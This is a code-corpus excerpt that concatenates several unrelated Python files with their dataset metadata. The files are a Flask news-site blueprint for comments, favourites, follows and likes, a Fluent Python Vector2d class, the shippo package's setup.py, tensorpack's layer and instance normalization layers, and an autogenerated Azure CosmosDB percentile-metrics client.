@blue_news.route('/news_comment',methods=['POST'])
@user_login_data
def news_comment():
#1.判断是否登陆
user=g.user
if not user:
return jsonify(errno=response_code.RET.SESSIONERR, errmsg='用户未登录')
#2.接受参数,news_id,comment,parent_id
json_dict=request.json
news_id=json_dict.get('news_id')
comment=json_dict.get('comment')
parent_id=json_dict.get('parent_id' )
#3.校验参数齐全,判断news_id,parent_id是整数
if not all([news_id,news_id]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数不全')
#4.根据news_id判断新闻是否存在
try:
news_id=int(news_id)
#如果没有parent_id,就表示评论新闻,传入表示评论别人回复
if parent_id:
parent_id=int(parent_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数不是整数')
try:
news=News.query.get(news_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询新闻失败')
if not news:
return jsonify(errno=response_code.RET.DBERR, errmsg='新闻不存在')
#5.创建comment模型
comment_obj=Comment()
comment_obj.content = comment
comment_obj.user_id=user.id
comment_obj.news_id=news.id
if parent_id:
comment_obj.parent_id=parent_id
# 6.同步到数据库
try:
db.session.add(comment_obj)
db.session.commit()
except Exception as e:
logging.error(e)
db.session.rollback()
return jsonify(errno=response_code.RET.DBERR, errmsg='保存数据失败')
#7.响应评论结果,讲评论数据返回前端渲染
return jsonify(errno=response_code.RET.OK, errmsg='评论成功',data=comment_obj.to_dict())
@blue_news.route('/news_collect',methods=['POST'])
@user_login_data
def news_collect():
#0.判断用户是否登陆
user=g.user
if not user:
return jsonify(errno=response_code.RET.DBERR, errmsg='查询用户失败')
#1.接受参数,action,news_id
json_dict=request.json
news_id=json_dict.get('news_id')
action=json_dict.get('action')
#2.校验参数齐全, 判断action是否是'collect', 或者'cancel_collect'
if not all([news_id,action]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='缺少必传参数')
if action not in ['collect','cancel_collect']:
return jsonify(errno=response_code.RET.PARAMERR, errmsg='缺少必传参数')
# 3.判断新闻是否存在news_id
try:
news=News.query.get(news_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询新闻失败')
if not news:
return jsonify(errno=response_code.RET.DBERR, errmsg='新闻不存在')
# 4.根据action收藏或者取消收藏
if action=='collect':
#收藏
if news not in user.collection_news:
user.collection_news.append(news)
else:
if news in user.collection_news:
user.collection_news.remove(news)
# 取消收藏
#5.同步数据库
try:
db.session.commit()
except Exception as e:
logging.error(e)
db.session.rollback()
return jsonify(errno=response_code.RET.OK, errmsg='存储数据失败')
return jsonify(errno=response_code.RET.OK, errmsg='收藏或取消收藏成功')
#5.返回收藏结果
@blue_news.route('/detail/<int:news_id>')
def news_detail(news_id):
#1.查询用户信息
user_id=session.get('user_id',None)
user=None
if user_id:
try:
user=User.query.get(user_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询用户失败')
#2.查询点击排行
news_clicks=None
try:
news_clicks=News.query.order_by(News.clicks.desc()).limit(constants.CLICK_RANK_MAX_NEWS)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询新闻排行失败')
#3.查询新闻详情信息
news_detail=None
try:
news_detail=News.query.get(news_id)
except Exception as e:
logging.error(e)
abort(404)
#抛出404,将来对404统一处理
if not news_detail:
abort(404)
news_detail.clicks+=1
try:
db.session.commit()
except Exception as e:
logging.error(e)
db.session.rollback()
#4.查看收藏状态
is_colletted = False
if user:
if news_detail in user.collection_news:
is_colletted = True
#5.查询评论信息前端渲染
comments=None
try:
comments=Comment.query.filter(Comment.news_id==news_id).order_by(Comment.create_time.desc()).all()
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询新闻评论失败')
# if not comments:
# return jsonify(errno=response_code.RET.DBERR, errmsg='无新闻评论')
# 6.查询当前新闻点赞
# 查询当前用户对那些评论点了赞
comment_likes = CommentLike.query.filter(CommentLike.user_id == user.id).all()
comment_like_id = [comment_like.comment_id for comment_like in comment_likes]
comment_dict_list=[]
for comment in comments:
comment_dict=comment.to_dict()
comment_dict['is_like']=False
if comment.id in comment_like_id: # 表示该评论当前用户点赞
comment_dict['is_like'] = True
comment_dict_list.append(comment_dict)
#7关注和取消关注
is_followed=False
if user and news_detail.user:
if news_detail.user in user.followed:
is_followed = True
context = {
'user': user.to_dict() if user else None,
'news_clicks': news_clicks,
'news_detail':news_detail.to_dict(),
'is_colletted':is_colletted,
'comments':comment_dict_list,
'is_followed':is_followed,
}
# context = {
# 'user': user.to_dict() if user else None,
# 'news_clicks': news_clicks,
# 'news': news.to_dict(),
# 'is_collected': is_collected,
# 'comments': comment_dict_list
# }
return render_template('news/detail.html',context=context)
| 29.238671
| 106
| 0.656851
|
import logging
from flask import abort
from flask import g
from flask import request
from flask import session, jsonify
from info import constants, db
from info import response_code
from info.models import User, News,Comment, CommentLike
from info.utils.comment import user_login_data
from . import blue_news
from flask import render_template
@blue_news.route('/followed_user',methods=['GET','POST'])
@user_login_data
def followed_user():
login_user = g.user
if not login_user:
return jsonify(errno=response_code.RET.SESSIONERR, errmsg='用户未登录')
user_id = request.json.get('user_id')
action = request.json.get('action')
if not all([user_id, action]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='缺少参数')
if action not in ['follow', 'unfollow']:
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数错误')
try:
other = User.query.get(user_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询用户数据失败')
if not other:
return jsonify(errno=response_code.RET.NODATA, errmsg='被关注的用户不存在')
if action == 'follow':
if other not in login_user.followed:
login_user.followed.append(other)
else:
if other in login_user.followed:
login_user.followed.remove(other)
try:
db.session.commit()
except Exception as e:
db.session.rollback()
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='操作失败')
return jsonify(errno=response_code.RET.OK, errmsg='操作成功')
@blue_news.route('/comment_like',methods=['POST'])
@user_login_data
def comment_like():
user=g.user
if not user:
return jsonify(errno=response_code.RET.SESSIONERR, errmsg='用户未登录')
json_dict = request.json
comment_id = json_dict.get('comment_id')
news_id = json_dict.get('news_id')
action = json_dict.get('action')
if not all([comment_id,action]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数不全')
if action not in ['remove','add']:
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数错误')
try:
comment=Comment.query.get(comment_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询评论失败')
if not comment:
return jsonify(errno=response_code.RET.DBERR, errmsg='该评论不存在')
comment_like_mode=None
comment_like_mode = CommentLike.query.filter(CommentLike.comment_id == comment.id,
CommentLike.user_id == user.id).first()
if action=='add':
if not comment_like_mode:
comment_like_mode=CommentLike()
comment_like_mode.user_id=user.id
comment_like_mode.comment_id=comment_id
comment.like_count+=1
db.session.add(comment_like_mode)
else:
if comment_like_mode:
db.session.delete(comment_like_mode)
try:
db.session.commit()
except Exception as e:
db.session.rollback()
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='操作失败')
return jsonify(errno=response_code.RET.OK, errmsg='操作成功')
@blue_news.route('/news_comment',methods=['POST'])
@user_login_data
def news_comment():
user=g.user
if not user:
return jsonify(errno=response_code.RET.SESSIONERR, errmsg='用户未登录')
json_dict=request.json
news_id=json_dict.get('news_id')
comment=json_dict.get('comment')
parent_id=json_dict.get('parent_id' )
if not all([news_id,news_id]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数不全')
try:
news_id=int(news_id)
if parent_id:
parent_id=int(parent_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.PARAMERR, errmsg='参数不是整数')
try:
news=News.query.get(news_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询新闻失败')
if not news:
return jsonify(errno=response_code.RET.DBERR, errmsg='新闻不存在')
comment_obj=Comment()
comment_obj.content = comment
comment_obj.user_id=user.id
comment_obj.news_id=news.id
if parent_id:
comment_obj.parent_id=parent_id
try:
db.session.add(comment_obj)
db.session.commit()
except Exception as e:
logging.error(e)
db.session.rollback()
return jsonify(errno=response_code.RET.DBERR, errmsg='保存数据失败')
return jsonify(errno=response_code.RET.OK, errmsg='评论成功',data=comment_obj.to_dict())
@blue_news.route('/news_collect',methods=['POST'])
@user_login_data
def news_collect():
user=g.user
if not user:
return jsonify(errno=response_code.RET.DBERR, errmsg='查询用户失败')
json_dict=request.json
news_id=json_dict.get('news_id')
action=json_dict.get('action')
if not all([news_id,action]):
return jsonify(errno=response_code.RET.PARAMERR, errmsg='缺少必传参数')
if action not in ['collect','cancel_collect']:
return jsonify(errno=response_code.RET.PARAMERR, errmsg='缺少必传参数')
try:
news=News.query.get(news_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询新闻失败')
if not news:
return jsonify(errno=response_code.RET.DBERR, errmsg='新闻不存在')
if action=='collect':
if news not in user.collection_news:
user.collection_news.append(news)
else:
if news in user.collection_news:
user.collection_news.remove(news)
try:
db.session.commit()
except Exception as e:
logging.error(e)
db.session.rollback()
return jsonify(errno=response_code.RET.OK, errmsg='存储数据失败')
return jsonify(errno=response_code.RET.OK, errmsg='收藏或取消收藏成功')
@blue_news.route('/detail/<int:news_id>')
def news_detail(news_id):
user_id=session.get('user_id',None)
user=None
if user_id:
try:
user=User.query.get(user_id)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询用户失败')
news_clicks=None
try:
news_clicks=News.query.order_by(News.clicks.desc()).limit(constants.CLICK_RANK_MAX_NEWS)
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询新闻排行失败')
news_detail=None
try:
news_detail=News.query.get(news_id)
except Exception as e:
logging.error(e)
abort(404)
if not news_detail:
abort(404)
news_detail.clicks+=1
try:
db.session.commit()
except Exception as e:
logging.error(e)
db.session.rollback()
is_colletted = False
if user:
if news_detail in user.collection_news:
is_colletted = True
comments=None
try:
comments=Comment.query.filter(Comment.news_id==news_id).order_by(Comment.create_time.desc()).all()
except Exception as e:
logging.error(e)
return jsonify(errno=response_code.RET.DBERR, errmsg='查询新闻评论失败')
comment_likes = CommentLike.query.filter(CommentLike.user_id == user.id).all()
comment_like_id = [comment_like.comment_id for comment_like in comment_likes]
comment_dict_list=[]
for comment in comments:
comment_dict=comment.to_dict()
comment_dict['is_like']=False
if comment.id in comment_like_id:
comment_dict['is_like'] = True
comment_dict_list.append(comment_dict)
is_followed=False
if user and news_detail.user:
if news_detail.user in user.followed:
is_followed = True
context = {
'user': user.to_dict() if user else None,
'news_clicks': news_clicks,
'news_detail':news_detail.to_dict(),
'is_colletted':is_colletted,
'comments':comment_dict_list,
'is_followed':is_followed,
}
return render_template('news/detail.html',context=context)
| true
| true
|
1c44627afca4e7d3f07b38ceb7c7b9103a678669
| 1,590
|
py
|
Python
|
FluentPython/pythonic_object/vector2d.py
|
xu6148152/Binea_Python_Project
|
d943eb5f4685d08f080b372dcf1a7cbd5d63efed
|
[
"MIT"
] | null | null | null |
FluentPython/pythonic_object/vector2d.py
|
xu6148152/Binea_Python_Project
|
d943eb5f4685d08f080b372dcf1a7cbd5d63efed
|
[
"MIT"
] | null | null | null |
FluentPython/pythonic_object/vector2d.py
|
xu6148152/Binea_Python_Project
|
d943eb5f4685d08f080b372dcf1a7cbd5d63efed
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from array import array
import math
class Vector2d:
__slots__ = ('__x', '__y')
typecode = 'd'
def __init__(self, x, y):
self.__x = x
self.__y = y
def __repr__(self):
class_name = type(self).__name__
return '{}({!r}, {!r})'.format(class_name, *self)
def __str__(self):
return str(tuple(self))
def __bytes__(self):
return bytes([ord(self.typecode)]) + bytes(array(self.typecode, self))
def __eq__(self, other):
return tuple(self) == tuple(other)
def __abs__(self):
return math.hypot(self.__x, self.__y)
def __bool__(self):
return bool(abs(self))
def angle(self):
return math.atan2(self.__y, self.__x)
def __format__(self, format_spec=''):
if format_spec.endswith('p'):
format_spec = format_spec[:-1]
coords = (abs(self), self.angle())
outer_fmt = '<{}, {}>'
else:
coords = self
outer_fmt = '({}, {})'
components = (format(c, format_spec) for c in coords)
return outer_fmt.format(*components)
@property
def x(self):
return self.__x
@property
def y(self):
return self.__y
def __iter__(self):
return (i for i in (self.__x, self.__y))
def __hash__(self):
return hash(self.__x) ^ hash(self.__y)
@classmethod
def frombytes(cls, octets):
typecode = chr(octets[0])
memv = memoryview(octets[1:]).cast(typecode)
return cls(*memv)
| 22.714286
| 78
| 0.561635
|
from array import array
import math
class Vector2d:
__slots__ = ('__x', '__y')
typecode = 'd'
def __init__(self, x, y):
self.__x = x
self.__y = y
def __repr__(self):
class_name = type(self).__name__
return '{}({!r}, {!r})'.format(class_name, *self)
def __str__(self):
return str(tuple(self))
def __bytes__(self):
return bytes([ord(self.typecode)]) + bytes(array(self.typecode, self))
def __eq__(self, other):
return tuple(self) == tuple(other)
def __abs__(self):
return math.hypot(self.__x, self.__y)
def __bool__(self):
return bool(abs(self))
def angle(self):
return math.atan2(self.__y, self.__x)
def __format__(self, format_spec=''):
if format_spec.endswith('p'):
format_spec = format_spec[:-1]
coords = (abs(self), self.angle())
outer_fmt = '<{}, {}>'
else:
coords = self
outer_fmt = '({}, {})'
components = (format(c, format_spec) for c in coords)
return outer_fmt.format(*components)
@property
def x(self):
return self.__x
@property
def y(self):
return self.__y
def __iter__(self):
return (i for i in (self.__x, self.__y))
def __hash__(self):
return hash(self.__x) ^ hash(self.__y)
@classmethod
def frombytes(cls, octets):
typecode = chr(octets[0])
memv = memoryview(octets[1:]).cast(typecode)
return cls(*memv)
| true
| true
|
1c4462df77242b80107f725e68f97cb39f16c436
| 1,408
|
py
|
Python
|
setup.py
|
penguinstampede/shippo-python-client
|
d21366d959d22ff301947072346479c287bf0f51
|
[
"MIT"
] | 101
|
2015-10-10T18:44:36.000Z
|
2022-01-26T03:54:27.000Z
|
setup.py
|
penguinstampede/shippo-python-client
|
d21366d959d22ff301947072346479c287bf0f51
|
[
"MIT"
] | 47
|
2015-08-07T21:13:50.000Z
|
2022-03-08T18:48:16.000Z
|
setup.py
|
penguinstampede/shippo-python-client
|
d21366d959d22ff301947072346479c287bf0f51
|
[
"MIT"
] | 71
|
2015-10-31T01:54:09.000Z
|
2022-02-17T22:43:30.000Z
|
import os
import sys
import warnings
from setuptools import setup
version_contents = {}
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, "shippo", "version.py"), encoding="utf-8") as f:
exec(f.read(), version_contents)
setup(
name='shippo',
version=version_contents['VERSION'],
description='Shipping API Python library (USPS, FedEx, UPS and more)',
author='Shippo',
author_email='support@goshippo.com',
url='https://goshippo.com/',
packages=['shippo', 'shippo.test', 'shippo.test.integration'],
package_data={'shippo': ['../VERSION']},
install_requires=[
'requests >= 2.21.0, <= 2.26.0',
'simplejson >= 3.16.0, <= 3.17.2',
],
test_suite='shippo.test.all',
tests_require=['unittest2', 'mock', 'vcrpy'],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
]
)
| 33.52381
| 77
| 0.620028
|
import os
import sys
import warnings
from setuptools import setup
version_contents = {}
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, "shippo", "version.py"), encoding="utf-8") as f:
exec(f.read(), version_contents)
setup(
name='shippo',
version=version_contents['VERSION'],
description='Shipping API Python library (USPS, FedEx, UPS and more)',
author='Shippo',
author_email='support@goshippo.com',
url='https://goshippo.com/',
packages=['shippo', 'shippo.test', 'shippo.test.integration'],
package_data={'shippo': ['../VERSION']},
install_requires=[
'requests >= 2.21.0, <= 2.26.0',
'simplejson >= 3.16.0, <= 3.17.2',
],
test_suite='shippo.test.all',
tests_require=['unittest2', 'mock', 'vcrpy'],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
]
)
| true
| true
|
1c4462e887341137a81c3efd2fa98f4ce8952bfa
| 2,882
|
py
|
Python
|
tensorpack/models/layer_norm.py
|
myelintek/tensorpack
|
fcbf5869d78cf7f3b59c46318b6c883a7ea12056
|
[
"Apache-2.0"
] | 3
|
2017-12-02T16:49:42.000Z
|
2018-11-04T16:53:44.000Z
|
tensorpack/models/layer_norm.py
|
dongzhuoyao/tensorpack
|
78bcf6053172075a761eac90ab22f0b631b272a0
|
[
"Apache-2.0"
] | 6
|
2020-01-28T23:03:24.000Z
|
2022-02-10T01:21:18.000Z
|
tensorpack/models/layer_norm.py
|
wdings/Mask-RCNN
|
8d5ae5cc2cfcf2e4e53b4d1064ac9e727f736d09
|
[
"Apache-2.0"
] | 5
|
2017-11-15T14:46:27.000Z
|
2018-11-04T16:54:06.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: layer_norm.py
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import tensorflow as tf
from .common import layer_register
__all__ = ['LayerNorm', 'InstanceNorm']
@layer_register()
def LayerNorm(x, epsilon=1e-5, use_bias=True, use_scale=True, data_format='NHWC'):
"""
Layer Normalization layer, as described in the paper:
`Layer Normalization <https://arxiv.org/abs/1607.06450>`_.
Args:
x (tf.Tensor): a 4D or 2D tensor. When 4D, the layout should match data_format.
epsilon (float): epsilon to avoid divide-by-zero.
use_scale, use_bias (bool): whether to use the extra affine transformation or not.
"""
shape = x.get_shape().as_list()
ndims = len(shape)
assert ndims in [2, 4]
mean, var = tf.nn.moments(x, list(range(1, len(shape))), keep_dims=True)
if data_format == 'NCHW':
chan = shape[1]
new_shape = [1, chan, 1, 1]
else:
chan = shape[-1]
new_shape = [1, 1, 1, chan]
if ndims == 2:
new_shape = [1, chan]
if use_bias:
beta = tf.get_variable('beta', [chan], initializer=tf.constant_initializer())
beta = tf.reshape(beta, new_shape)
else:
beta = tf.zeros([1] * ndims, name='beta')
if use_scale:
gamma = tf.get_variable('gamma', [chan], initializer=tf.constant_initializer(1.0))
gamma = tf.reshape(gamma, new_shape)
else:
gamma = tf.ones([1] * ndims, name='gamma')
return tf.nn.batch_normalization(x, mean, var, beta, gamma, epsilon, name='output')
@layer_register()
def InstanceNorm(x, epsilon=1e-5, data_format='NHWC', use_affine=True):
"""
Instance Normalization, as in the paper:
`Instance Normalization: The Missing Ingredient for Fast Stylization
<https://arxiv.org/abs/1607.08022>`_.
Args:
x (tf.Tensor): a 4D tensor.
epsilon (float): avoid divide-by-zero
use_affine (bool): whether to apply learnable affine transformation
"""
shape = x.get_shape().as_list()
assert len(shape) == 4, "Input of InstanceNorm has to be 4D!"
if data_format == 'NHWC':
axis = [1, 2]
ch = shape[3]
new_shape = [1, 1, 1, ch]
else:
axis = [2, 3]
ch = shape[1]
new_shape = [1, ch, 1, 1]
assert ch is not None, "Input of InstanceNorm require known channel!"
mean, var = tf.nn.moments(x, axis, keep_dims=True)
if not use_affine:
return tf.divide(x - mean, tf.sqrt(var + epsilon), name='output')
beta = tf.get_variable('beta', [ch], initializer=tf.constant_initializer())
beta = tf.reshape(beta, new_shape)
gamma = tf.get_variable('gamma', [ch], initializer=tf.constant_initializer(1.0))
gamma = tf.reshape(gamma, new_shape)
return tf.nn.batch_normalization(x, mean, var, beta, gamma, epsilon, name='output')
| 33.126437
| 90
| 0.630812
|
import tensorflow as tf
from .common import layer_register
__all__ = ['LayerNorm', 'InstanceNorm']
@layer_register()
def LayerNorm(x, epsilon=1e-5, use_bias=True, use_scale=True, data_format='NHWC'):
shape = x.get_shape().as_list()
ndims = len(shape)
assert ndims in [2, 4]
mean, var = tf.nn.moments(x, list(range(1, len(shape))), keep_dims=True)
if data_format == 'NCHW':
chan = shape[1]
new_shape = [1, chan, 1, 1]
else:
chan = shape[-1]
new_shape = [1, 1, 1, chan]
if ndims == 2:
new_shape = [1, chan]
if use_bias:
beta = tf.get_variable('beta', [chan], initializer=tf.constant_initializer())
beta = tf.reshape(beta, new_shape)
else:
beta = tf.zeros([1] * ndims, name='beta')
if use_scale:
gamma = tf.get_variable('gamma', [chan], initializer=tf.constant_initializer(1.0))
gamma = tf.reshape(gamma, new_shape)
else:
gamma = tf.ones([1] * ndims, name='gamma')
return tf.nn.batch_normalization(x, mean, var, beta, gamma, epsilon, name='output')
@layer_register()
def InstanceNorm(x, epsilon=1e-5, data_format='NHWC', use_affine=True):
shape = x.get_shape().as_list()
assert len(shape) == 4, "Input of InstanceNorm has to be 4D!"
if data_format == 'NHWC':
axis = [1, 2]
ch = shape[3]
new_shape = [1, 1, 1, ch]
else:
axis = [2, 3]
ch = shape[1]
new_shape = [1, ch, 1, 1]
assert ch is not None, "Input of InstanceNorm require known channel!"
mean, var = tf.nn.moments(x, axis, keep_dims=True)
if not use_affine:
return tf.divide(x - mean, tf.sqrt(var + epsilon), name='output')
beta = tf.get_variable('beta', [ch], initializer=tf.constant_initializer())
beta = tf.reshape(beta, new_shape)
gamma = tf.get_variable('gamma', [ch], initializer=tf.constant_initializer(1.0))
gamma = tf.reshape(gamma, new_shape)
return tf.nn.batch_normalization(x, mean, var, beta, gamma, epsilon, name='output')
| true
| true
|
1c4462e988a95308633ced6d419f8d86daa04317
| 6,331
|
py
|
Python
|
src/cosmosdb-preview/azext_cosmosdb_preview/vendored_sdks/azure_mgmt_cosmosdb/operations/_percentile_operations.py
|
santosh02iiit/azure-cli-extensions
|
24247cfa19e2a5894937f19e17fbdc8308b28ef6
|
[
"MIT"
] | 1
|
2021-08-03T18:32:54.000Z
|
2021-08-03T18:32:54.000Z
|
src/cosmosdb-preview/azext_cosmosdb_preview/vendored_sdks/azure_mgmt_cosmosdb/operations/_percentile_operations.py
|
santosh02iiit/azure-cli-extensions
|
24247cfa19e2a5894937f19e17fbdc8308b28ef6
|
[
"MIT"
] | 4
|
2020-09-07T12:56:24.000Z
|
2021-02-04T12:19:20.000Z
|
src/cosmosdb-preview/azext_cosmosdb_preview/vendored_sdks/azure_mgmt_cosmosdb/operations/_percentile_operations.py
|
santosh02iiit/azure-cli-extensions
|
24247cfa19e2a5894937f19e17fbdc8308b28ef6
|
[
"MIT"
] | 2
|
2021-09-22T08:25:32.000Z
|
2021-09-24T06:55:31.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class PercentileOperations(object):
"""PercentileOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.cosmosdb.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_metrics(
self,
resource_group_name, # type: str
account_name, # type: str
filter, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.PercentileMetricListResult"]
"""Retrieves the metrics determined by the given filter for the given database account. This url
is only for PBS and Replication Latency data.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param filter: An OData filter expression that describes a subset of metrics to return. The
parameters that can be filtered are name.value (name of the metric, can have an or of multiple
names), startTime, endTime, and timeGrain. The supported operator is eq.
:type filter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PercentileMetricListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.cosmosdb.models.PercentileMetricListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PercentileMetricListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-04-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_metrics.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('PercentileMetricListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_metrics.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/percentile/metrics'} # type: ignore
| 49.077519
| 202
| 0.660559
|
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class PercentileOperations(object):
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_metrics(
self,
resource_group_name,
account_name,
filter,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-04-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
url = self.list_metrics.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {}
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('PercentileMetricListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_metrics.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/percentile/metrics'}
| true
| true
|
